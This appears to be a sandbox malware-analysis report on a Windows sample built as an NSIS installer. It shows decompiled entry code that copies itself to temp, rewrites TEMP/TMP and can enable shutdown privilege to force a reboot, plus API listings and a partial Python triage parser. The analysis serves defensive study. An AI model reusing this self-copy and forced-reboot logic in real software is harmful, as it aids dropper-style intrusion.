API calls 3973->3988 3989 404e79 3973->3989 3974->3955 3978 404c53 ShowWindow 3975->3978 3979 404c6b 3975->3979 3976->3949 3976->3964 3977->3971 3982 404baf SendMessageA 3977->3982 3984 404c2e 3977->3984 3986 404beb SendMessageA 3977->3986 3987 404bfc SendMessageA 3977->3987 3995 40405b SendMessageA 3978->3995 3996 40405b SendMessageA 3979->3996 3982->3977 3983->3952 3984->3971 3984->3975 3985 404ebd 3990 404f83 InvalidateRect 3985->3990 3994 404f31 SendMessageA SendMessageA 3985->3994 3986->3977 3987->3977 3988->3989 3989->3985 3992 404ea7 SendMessageA 3989->3992 3990->3967 3991 404f99 3990->3991 3997 404912 3991->3997 3992->3985 3994->3985 3995->3955 3996->3959 4000 40484d 3997->4000 3999 404927 3999->3967 4001 404863 4000->4001 4002 405f87 17 API calls 4001->4002 4003 4048c7 4002->4003 4004 405f87 17 API calls 4003->4004 4005 4048d2 4004->4005 4006 405f87 17 API calls 4005->4006 4007 
4048e8 lstrlenA wsprintfA SetDlgItemTextA 4006->4007 4007->3999 4008 401490 4009 40508c 24 API calls 4008->4009 4010 401497 4009->4010 4011 401d95 GetDC 4012 402a9f 17 API calls 4011->4012 4013 401da7 GetDeviceCaps MulDiv ReleaseDC 4012->4013 4014 402a9f 17 API calls 4013->4014 4015 401dd8 4014->4015 4016 405f87 17 API calls 4015->4016 4017 401e15 CreateFontIndirectA 4016->4017 4018 402577 4017->4018 4019 404496 4020 4044c2 4019->4020 4021 4044d3 4019->4021 4080 405665 GetDlgItemTextA 4020->4080 4022 4044df GetDlgItem 4021->4022 4030 40453e 4021->4030 4025 4044f3 4022->4025 4024 4044cd 4027 4061cf 5 API calls 4024->4027 4028 404507 SetWindowTextA 4025->4028 4033 405996 4 API calls 4025->4033 4026 404622 4029 4047cc 4026->4029 4082 405665 GetDlgItemTextA 4026->4082 4027->4021 4034 404026 18 API calls 4028->4034 4032 40408d 8 API calls 4029->4032 4030->4026 4030->4029 4035 405f87 17 API calls 4030->4035 4037 4047e0 4032->4037 4038 4044fd 4033->4038 4039 404523 4034->4039 4040 4045b2 SHBrowseForFolderA 4035->4040 4036 404652 4041 4059eb 18 API calls 4036->4041 4038->4028 4045 4058fd 3 API calls 4038->4045 4042 404026 18 API calls 4039->4042 4040->4026 4043 4045ca CoTaskMemFree 4040->4043 4044 404658 4041->4044 4046 404531 4042->4046 4047 4058fd 3 API calls 4043->4047 4083 405f65 lstrcpynA 4044->4083 4045->4028 4081 40405b SendMessageA 4046->4081 4049 4045d7 4047->4049 4052 40460e SetDlgItemTextA 4049->4052 4056 405f87 17 API calls 4049->4056 4051 404537 4054 4062fd 5 API calls 4051->4054 4052->4026 4053 40466f 4055 4062fd 5 API calls 4053->4055 4054->4030 4063 404676 4055->4063 4057 4045f6 lstrcmpiA 4056->4057 4057->4052 4059 404607 lstrcatA 4057->4059 4058 4046b2 4084 405f65 lstrcpynA 4058->4084 4059->4052 4061 4046b9 4062 405996 4 API calls 4061->4062 4064 4046bf GetDiskFreeSpaceA 4062->4064 4063->4058 4067 405944 2 API calls 4063->4067 4069 40470a 4063->4069 4066 4046e3 MulDiv 4064->4066 4064->4069 4066->4069 4067->4063 4068 40477b 4071 40479e 4068->4071 4073 
40140b 2 API calls 4068->4073 4069->4068 4070 404912 20 API calls 4069->4070 4072 404768 4070->4072 4085 404048 EnableWindow 4071->4085 4074 40477d SetDlgItemTextA 4072->4074 4075 40476d 4072->4075 4073->4071 4074->4068 4077 40484d 20 API calls 4075->4077 4077->4068 4078 4047ba 4078->4029 4079 4043ef SendMessageA 4078->4079 4079->4029 4080->4024 4081->4051 4082->4036 4083->4053 4084->4061 4085->4078 4086 401d1a 4087 402a9f 17 API calls 4086->4087 4088 401d28 SetWindowLongA 4087->4088 4089 402951 4088->4089 4095 40149d 4096 4022e1 4095->4096 4097 4014ab PostQuitMessage 4095->4097 4097->4096 4098 40159d 4099 402ac1 17 API calls 4098->4099 4100 4015a4 SetFileAttributesA 4099->4100 4101 4015b6 4100->4101 4102 401a1e 4103 402ac1 17 API calls 4102->4103 4104 401a27 ExpandEnvironmentStringsA 4103->4104 4105 401a3b 4104->4105 4107 401a4e 4104->4107 4106 401a40 lstrcmpA 4105->4106 4105->4107 4106->4107 4108 40171f 4109 402ac1 17 API calls 4108->4109 4110 401726 SearchPathA 4109->4110 4111 401741 4110->4111 4112 401e25 4113 402a9f 17 API calls 4112->4113 4114 401e2b 4113->4114 4115 402a9f 17 API calls 4114->4115 4116 401e37 4115->4116 4117 401e43 ShowWindow 4116->4117 4118 401e4e EnableWindow 4116->4118 4119 402951 4117->4119 4118->4119 4120 401f2b 4121 402ac1 17 API calls 4120->4121 4122 401f32 4121->4122 4123 406268 2 API calls 4122->4123 4124 401f38 4123->4124 4126 401f4a 4124->4126 4127 405ec3 wsprintfA 4124->4127 4127->4126 4128 40292c SendMessageA 4129 402946 InvalidateRect 4128->4129 4130 402951 4128->4130 4129->4130 3211 401932 3212 401934 3211->3212 3217 402ac1 3212->3217 3218 402acd 3217->3218 3219 405f87 17 API calls 3218->3219 3220 402aee 3219->3220 3221 401939 3220->3221 3222 4061cf 5 API calls 3220->3222 3223 40572d 3221->3223 3222->3221 3224 4059eb 18 API calls 3223->3224 3225 40574d 3224->3225 3226 405755 DeleteFileA 3225->3226 3227 40576c 3225->3227 3228 401942 3226->3228 3230 40589a 3227->3230 3260 405f65 lstrcpynA 3227->3260 3230->3228 3236 406268 2 API 
calls 3230->3236 3231 405792 3232 4057a5 3231->3232 3233 405798 lstrcatA 3231->3233 3235 405944 2 API calls 3232->3235 3234 4057ab 3233->3234 3237 4057b9 lstrcatA 3234->3237 3239 4057c4 lstrlenA FindFirstFileA 3234->3239 3235->3234 3238 4058be 3236->3238 3237->3239 3238->3228 3240 4058fd 3 API calls 3238->3240 3239->3230 3252 4057e8 3239->3252 3241 4058c8 3240->3241 3243 4056e5 5 API calls 3241->3243 3242 405928 CharNextA 3242->3252 3244 4058d4 3243->3244 3245 4058d8 3244->3245 3246 4058ee 3244->3246 3245->3228 3251 40508c 24 API calls 3245->3251 3249 40508c 24 API calls 3246->3249 3247 405879 FindNextFileA 3250 405891 FindClose 3247->3250 3247->3252 3249->3228 3250->3230 3253 4058e5 3251->3253 3252->3242 3252->3247 3256 40572d 60 API calls 3252->3256 3257 40508c 24 API calls 3252->3257 3258 40508c 24 API calls 3252->3258 3259 405d44 36 API calls 3252->3259 3261 405f65 lstrcpynA 3252->3261 3262 4056e5 3252->3262 3254 405d44 36 API calls 3253->3254 3254->3228 3256->3252 3257->3247 3258->3252 3259->3252 3260->3231 3261->3252 3270 405ad9 GetFileAttributesA 3262->3270 3265 405712 3265->3252 3266 405700 RemoveDirectoryA 3268 40570e 3266->3268 3267 405708 DeleteFileA 3267->3268 3268->3265 3269 40571e SetFileAttributesA 3268->3269 3269->3265 3271 4056f1 3270->3271 3272 405aeb SetFileAttributesA 3270->3272 3271->3265 3271->3266 3271->3267 3272->3271 4131 4026b4 4132 4026ba 4131->4132 4133 402951 4132->4133 4134 4026c2 FindClose 4132->4134 4134->4133 4135 402736 4136 402ac1 17 API calls 4135->4136 4137 402744 4136->4137 4138 40275a 4137->4138 4139 402ac1 17 API calls 4137->4139 4140 405ad9 2 API calls 4138->4140 4139->4138 4141 402760 4140->4141 4163 405afe GetFileAttributesA CreateFileA 4141->4163 4143 40276d 4144 402816 4143->4144 4145 402779 GlobalAlloc 4143->4145 4148 402831 4144->4148 4149 40281e DeleteFileA 4144->4149 4146 402792 4145->4146 4147 40280d CloseHandle 4145->4147 4164 4031a9 SetFilePointer 4146->4164 4147->4144 4149->4148 4151 402798 4152 403193 ReadFile 
4151->4152 4153 4027a1 GlobalAlloc 4152->4153 4154 4027b1 4153->4154 4155 4027eb 4153->4155 4157 402f81 31 API calls 4154->4157 4156 405ba5 WriteFile 4155->4156 4158 4027f7 GlobalFree 4156->4158 4162 4027be 4157->4162 4159 402f81 31 API calls 4158->4159 4160 40280a 4159->4160 4160->4147 4161 4027e2 GlobalFree 4161->4155 4162->4161 4163->4143 4164->4151 4165 402837 4166 402a9f 17 API calls 4165->4166 4167 40283d 4166->4167 4168 402865 4167->4168 4169 40287c 4167->4169 4177 402716 4167->4177 4172 402879 4168->4172 4173 40286a 4168->4173 4170 402896 4169->4170 4171 402886 4169->4171 4175 405f87 17 API calls 4170->4175 4174 402a9f 17 API calls 4171->4174 4180 405ec3 wsprintfA 4172->4180 4179 405f65 lstrcpynA 4173->4179 4174->4177 4175->4177 4179->4177 4180->4177 4181 4014b7 4182 4014bd 4181->4182 4183 401389 2 API calls 4182->4183 4184 4014c5 4183->4184 4185 401b39 4186 402ac1 17 API calls 4185->4186 4187 401b40 4186->4187 4188 402a9f 17 API calls 4187->4188 4189 401b49 wsprintfA 4188->4189 4190 402951 4189->4190 4191 40413a lstrcpynA lstrlenA 4192 40233a 4193 402ac1 17 API calls 4192->4193 4194 40234b 4193->4194 4195 402ac1 17 API calls 4194->4195 4196 402354 4195->4196 4197 402ac1 17 API calls 4196->4197 4198 40235e GetPrivateProfileStringA 4197->4198 3335 4015bb 3336 402ac1 17 API calls 3335->3336 3337 4015c2 3336->3337 3338 405996 4 API calls 3337->3338 3351 4015ca 3338->3351 3339 401624 3341 401652 3339->3341 3342 401629 3339->3342 3340 405928 CharNextA 3340->3351 3344 401423 24 API calls 3341->3344 3354 401423 3342->3354 3348 40164a 3344->3348 3347 4055cf 2 API calls 3347->3351 3349 4055ec 5 API calls 3349->3351 3350 40163b SetCurrentDirectoryA 3350->3348 3351->3339 3351->3340 3351->3347 3351->3349 3352 40160c GetFileAttributesA 3351->3352 3353 405552 4 API calls 3351->3353 3352->3351 3353->3351 3355 40508c 24 API calls 3354->3355 3356 401431 3355->3356 3357 405f65 lstrcpynA 3356->3357 3357->3350 4199 401d3b GetDlgItem GetClientRect 4200 402ac1 17 API calls 
4199->4200 4201 401d6b LoadImageA SendMessageA 4200->4201 4202 401d89 DeleteObject 4201->4202 4203 402951 4201->4203 4202->4203 4204 4016bb 4205 402ac1 17 API calls 4204->4205 4206 4016c1 GetFullPathNameA 4205->4206 4207 4016d8 4206->4207 4213 4016f9 4206->4213 4210 406268 2 API calls 4207->4210 4207->4213 4208 402951 4209 40170d GetShortPathNameA 4209->4208 4211 4016e9 4210->4211 4211->4213 4214 405f65 lstrcpynA 4211->4214 4213->4208 4213->4209 4214->4213

                Control-flow Graph

                C-Code - Quality: 85%
                			_entry_() {
                				signed int _t42;
                				intOrPtr* _t47;
                				CHAR* _t51;
                				char* _t54;
                				CHAR* _t56;
                				void* _t60;
                				intOrPtr _t62;
                				int _t63;
                				int _t66;
                				signed int _t67;
                				int _t68;
                				signed int _t70;
                				void* _t94;
                				signed int _t110;
                				void* _t113;
                				void* _t118;
                				intOrPtr* _t119;
                				char _t122;
                				signed int _t141;
                				signed int _t142;
                				int _t150;
                				void* _t151;
                				intOrPtr* _t153;
                				CHAR* _t156;
                				CHAR* _t157;
                				void* _t159;
                				char* _t160;
                				void* _t163;
                				void* _t164;
                				intOrPtr _t189;
                
                				 *(_t164 + 0x18) = 0;
                				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                				 *(_t164 + 0x20) = 0;
                				 *(_t164 + 0x14) = 0x20;
                				SetErrorMode(0x8001); // executed
                				_t42 = GetVersion() & 0xbfffffff;
                				 *0x42f40c = _t42;
                				if(_t42 != 6) {
                					_t119 = E004062FD(0);
                					if(_t119 != 0) {
                						 *_t119(0xc00);
                					}
                				}
                				_t156 = "UXTHEME";
                				do {
                					E0040628F(_t156); // executed
                					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                				} while ( *_t156 != 0);
                				E004062FD(0xa);
                				 *0x42f404 = E004062FD(8);
                				_t47 = E004062FD(6);
                				if(_t47 != 0) {
                					_t47 =  *_t47(0x1e);
                					if(_t47 != 0) {
                						 *0x42f40f =  *0x42f40f | 0x00000040;
                					}
                				}
                				__imp__#17(_t159);
                				__imp__OleInitialize(0); // executed
                				 *0x42f4d8 = _t47;
                				SHGetFileInfoA(0x429830, 0, _t164 + 0x38, 0x160, 0); // executed
                				E00405F65("Setup Setup", "NSIS Error");
                				_t51 = GetCommandLineA();
                				_t160 = "\"C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe\"";
                				E00405F65(_t160, _t51);
                				 *0x42f400 = GetModuleHandleA(0);
                				_t54 = _t160;
                				if("\"C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe\"" == 0x22) {
                					 *(_t164 + 0x14) = 0x22;
                					_t54 =  &M00435001;
                				}
                				_t56 = CharNextA(E00405928(_t54,  *(_t164 + 0x14)));
                				 *(_t164 + 0x1c) = _t56;
                				while(1) {
                					_t122 =  *_t56;
                					_t172 = _t122;
                					if(_t122 == 0) {
                						break;
                					}
                					__eflags = _t122 - 0x20;
                					if(_t122 != 0x20) {
                						L13:
                						__eflags =  *_t56 - 0x22;
                						 *(_t164 + 0x14) = 0x20;
                						if( *_t56 == 0x22) {
                							_t56 =  &(_t56[1]);
                							__eflags = _t56;
                							 *(_t164 + 0x14) = 0x22;
                						}
                						__eflags =  *_t56 - 0x2f;
                						if( *_t56 != 0x2f) {
                							L25:
                							_t56 = E00405928(_t56,  *(_t164 + 0x14));
                							__eflags =  *_t56 - 0x22;
                							if(__eflags == 0) {
                								_t56 =  &(_t56[1]);
                								__eflags = _t56;
                							}
                							continue;
                						} else {
                							_t56 =  &(_t56[1]);
                							__eflags =  *_t56 - 0x53;
                							if( *_t56 != 0x53) {
                								L20:
                								__eflags =  *_t56 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                								if( *_t56 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                									L24:
                									__eflags =  *((intOrPtr*)(_t56 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                									if( *((intOrPtr*)(_t56 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                										 *((char*)(_t56 - 2)) = 0;
                										__eflags =  &(_t56[2]);
                										E00405F65(0x435400,  &(_t56[2]));
                										L30:
                										_t157 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
                										GetTempPathA(0x400, _t157);
                										_t60 = E004031C0(_t172);
                										_t173 = _t60;
                										if(_t60 != 0) {
                											L33:
                											DeleteFileA("1033"); // executed
                											_t62 = E00402D48(_t175,  *(_t164 + 0x20)); // executed
                											 *((intOrPtr*)(_t164 + 0x10)) = _t62;
                											if(_t62 != 0) {
                												L43:
                												ExitProcess(); // executed
                												__imp__OleUninitialize(); // executed
                												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                													__eflags =  *0x42f4b4;
                													if( *0x42f4b4 == 0) {
                														L67:
                														_t63 =  *0x42f4cc;
                														__eflags = _t63 - 0xffffffff;
                														if(_t63 != 0xffffffff) {
                															 *(_t164 + 0x14) = _t63;
                														}
                														ExitProcess( *(_t164 + 0x14));
                													}
                													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                													__eflags = _t66;
                													_t150 = 2;
                													if(_t66 != 0) {
                														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                														 *(_t164 + 0x38) = 1;
                														 *(_t164 + 0x44) = _t150;
                														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                													}
                													_t67 = E004062FD(4);
                													__eflags = _t67;
                													if(_t67 == 0) {
                														L65:
                														_t68 = ExitWindowsEx(_t150, 0x80040002);
                														__eflags = _t68;
                														if(_t68 != 0) {
                															goto L67;
                														}
                														goto L66;
                													} else {
                														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                														__eflags = _t70;
                														if(_t70 == 0) {
                															L66:
                															E0040140B(9);
                															goto L67;
                														}
                														goto L65;
                													}
                												}
                												E00405681( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                												ExitProcess(2);
                											}
                											if( *0x42f420 == 0) {
                												L42:
                												 *0x42f4cc =  *0x42f4cc | 0xffffffff;
                												 *(_t164 + 0x18) = E004037B5( *0x42f4cc);
                												goto L43;
                											}
                											_t153 = E00405928(_t160, 0);
                											if(_t153 < _t160) {
                												L39:
                												_t182 = _t153 - _t160;
                												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                												if(_t153 < _t160) {
                													_t151 = E004055EC(_t185);
                													lstrcatA(_t157, "~nsu");
                													if(_t151 != 0) {
                														lstrcatA(_t157, "A");
                													}
                													lstrcatA(_t157, ".tmp");
                													_t162 = "C:\\Users\\frontdesk\\Desktop";
                													if(lstrcmpiA(_t157, "C:\\Users\\frontdesk\\Desktop") != 0) {
                														_push(_t157);
                														if(_t151 == 0) {
                															E004055CF();
                														} else {
                															E00405552();
                														}
                														SetCurrentDirectoryA(_t157);
                														_t189 =  *0x435400; // 0x0
                														if(_t189 == 0) {
                															E00405F65(0x435400, _t162);
                														}
                														E00405F65(0x430000,  *(_t164 + 0x1c));
                														_t137 = "A";
                														_t163 = 0x1a;
                														 *0x430400 = "A";
                														do {
                															E00405F87(0, 0x429430, _t157, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x120)));
                															DeleteFileA(0x429430);
                															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe", 0x429430, 1) != 0) {
                																E00405D44(_t137, 0x429430, 0);
                																E00405F87(0, 0x429430, _t157, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x124)));
                																_t94 = E00405604(0x429430);
                																if(_t94 != 0) {
                																	CloseHandle(_t94);
                																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                																}
                															}
                															 *0x430400 =  *0x430400 + 1;
                															_t163 = _t163 - 1;
                														} while (_t163 != 0);
                														E00405D44(_t137, _t157, 0);
                													}
                													goto L43;
                												}
                												 *_t153 = 0;
                												_t154 = _t153 + 4;
                												if(E004059EB(_t182, _t153 + 4) == 0) {
                													goto L43;
                												}
                												E00405F65(0x435400, _t154);
                												E00405F65("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp", _t154);
                												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                												goto L42;
                											}
                											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                											while( *_t153 != _t110) {
                												_t153 = _t153 - 1;
                												if(_t153 >= _t160) {
                													continue;
                												}
                												goto L39;
                											}
                											goto L39;
                										}
                										GetWindowsDirectoryA(_t157, 0x3fb); // the directory from the earlier GetTempPathA call was not usable: try %SystemRoot%\Temp next
                										lstrcatA(_t157, "\\Temp");
                										_t113 = E004031C0(_t173); // E004031C0 validates the candidate temp directory; nonzero = usable
                										_t174 = _t113;
                										if(_t113 != 0) {
                											goto L33;
                										}
                										GetTempPathA(0x3fc, _t157); // last resort: <GetTempPathA>Low, i.e. <TEMP>\Low, and point this process' TEMP and TMP at it
                										lstrcatA(_t157, "Low");
                										SetEnvironmentVariableA("TEMP", _t157);
                										SetEnvironmentVariableA("TMP", _t157);
                										_t118 = E004031C0(_t174);
                										_t175 = _t118;
                										if(_t118 == 0) {
                											goto L43; // no usable temp directory at all: give up
                										}
                										goto L33;
                									}
                									goto L25;
                								}
                								_t141 = _t56[4];
                								__eflags = _t141 - 0x20;
                								if(_t141 == 0x20) {
                									L23:
                									_t15 = _t164 + 0x20;
                									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                									__eflags =  *_t15;
                									goto L24;
                								}
                								__eflags = _t141;
                								if(_t141 != 0) {
                									goto L24;
                								}
                								goto L23;
                							}
                							_t142 = _t56[1];
                							__eflags = _t142 - 0x20;
                							if(_t142 == 0x20) {
                								L19:
                								 *0x42f4c0 = 1;
                								goto L20;
                							}
                							__eflags = _t142;
                							if(_t142 != 0) {
                								goto L20;
                							}
                							goto L19;
                						}
                					} else {
                						goto L12;
                					}
                					do {
                						L12:
                						_t56 =  &(_t56[1]);
                						__eflags =  *_t56 - 0x20;
                					} while ( *_t56 == 0x20);
                					goto L13;
                				}
                				goto L30;
                			}

                APIs
                • SetErrorMode.KERNELBASE ref: 00403216
                • GetVersion.KERNEL32 ref: 0040321C
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
                • OleInitialize.OLE32(00000000), ref: 00403292
                • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
                • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
                • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
                • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
                • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464
                  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                  • Part of subcall function 004037B5: GetUserDefaultUILanguage.KERNELBASE(00000002,772EFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000), ref: 004037CF
                  • Part of subcall function 004037B5: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,772EFA90), ref: 004038A5
                  • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe,0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038B8
                  • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                  • Part of subcall function 004037B5: LoadImageA.USER32 ref: 0040390C
                  • Part of subcall function 004037B5: RegisterClassA.USER32 ref: 00403949
                • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 0040350D
                  • Part of subcall function 004036DB: CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
                • ExitProcess.KERNEL32 ref: 00403533
                • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
                • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
                • ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
                • ExitProcess.KERNEL32 ref: 004036D5
                  • Part of subcall function 00405681: MessageBoxIndirectA.USER32 ref: 004056DC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Process$Exit$FileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpilstrcpyn
                • String ID: "$"C:\Users\user\Desktop\Ptmhbplhxb.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\Ptmhbplhxb.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                • API String ID: 3861850387-697963099
                • Opcode ID: 43770b6c325a099cedcf9499065752b98bf324a98eae67160cb2c941fe278442
                • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
                • Opcode Fuzzy Hash: 43770b6c325a099cedcf9499065752b98bf324a98eae67160cb2c941fe278442
                • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E
                Uniqueness

                Uniqueness Score: -1.00%
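
                The API list for this function is the flattened form of Joe Sandbox's per-function call trace: one line per call with the module, the argument values observed, and the instruction address, plus calls made from subroutines marked "Part of subcall function". The Python below is an added triage helper, not part of the report and not code from the sample: it parses lines in that layout into records and flags the calls in this trace that deserve a second look (the SeShutdownPrivilege lookup feeding ExitWindowsEx with uFlags 2, which is EWX_REBOOT; the rewrite of TEMP and TMP; GetProcAddress). The sample lines are copied from the list above; the record layout and the flag rules are this example's own choices.

```python
import re
from collections import Counter

# Constructed sample: a subset of the "APIs" lines from the report above, pasted verbatim.
SAMPLE_TRACE = r"""
• SetErrorMode.KERNELBASE ref: 00403216
• GetVersion.KERNEL32 ref: 0040321C
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
• GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
• GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
• ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
• ExitProcess.KERNEL32 ref: 004036D5
"""

# One report line: optional bullet, optional "Part of subcall function XXXXXXXX: " prefix,
# Api.MODULE, optional "(args)", then ", ref: ADDR" (the comma is absent when there are no args).
API_LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>#?\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_trace(text):
    """Turn report API lines into dicts: api, module, args (list of str), ref (int), via (int or None)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE_RE.match(line)
        if not m:
            continue  # headers such as "APIs" or "Strings", blank lines, anything else
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append({
            "api": m["api"],
            "module": m["module"],
            "args": args,
            "ref": int(m["ref"], 16),
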